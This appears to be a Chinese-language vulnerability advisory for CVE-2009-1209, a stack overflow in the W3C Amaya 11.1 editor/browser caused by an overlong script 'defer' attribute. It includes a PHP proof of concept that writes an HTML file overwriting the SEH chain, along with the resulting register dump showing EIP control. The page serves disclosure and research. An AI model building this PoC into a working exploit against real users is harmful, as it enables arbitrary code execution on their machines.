发布日期：2009-03-30
更新日期：2009-04-01

受影响系统：

W3C Amaya 11.1

描述：

---

BUGTRAQ  ID: 34295
CVE(CAN) ID: CVE-2009-1209

Amaya是W3C出品的所见即所得的网页编辑/浏览器。

如果用户受骗使用Amaya打开的网页中script标签设置了超长的defer属性的话，则在解析该网页时就可以触发栈溢出，导致执行任意代码。

<*来源：Alfons Luja
  
  链接：http://secunia.com/advisories/34531/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

/**//*

     Amaya 11.1 W3C's editor/browser
     Stack Owerflow POC
     Discover by Alfons Luja
     Thx : OiN
     select * from friends --
     This stUff overwrite SEH in my box XP home sp 2
     To correctly overwrite seh you must upload "remote_love.html" to remote server
     Amaya allow only printable shellcode in this case  
    
     EAX:00000000
     ECX:43434343
     EDX:7C9037D8
     EBX:00000000
     ESP:0012DDD0
     EBP:0012DDF0
     ESI:00000000
     EDI:00000000
     EIP:43434343
    
      
*//**/

$junk = "\x41";
$n_seh = "\x42\x42\x42\x42";  //pointer to next seh
$h_seh = "\x43\x43\x43\x43";  //seh handler

for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; }

$junk.=$n_seh;
$junk.=$h_seh;
$hello = "<script defer=\"".$junk."\">";

$hnd = fopen("remote_love.html","w");
    
       if($hnd){

          fputs($hnd,$hello);
          fclose($hnd);
          echo"DONE !!\n";
    
       } else {

          echo"Kupa !!\n";

       }

?>

http://www.milw0rm.com/exploits/8321

建议：

---

厂商补丁：

W3C
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.w3.org/Amaya/

浏览次数：2404
严重程度：0（网友投票）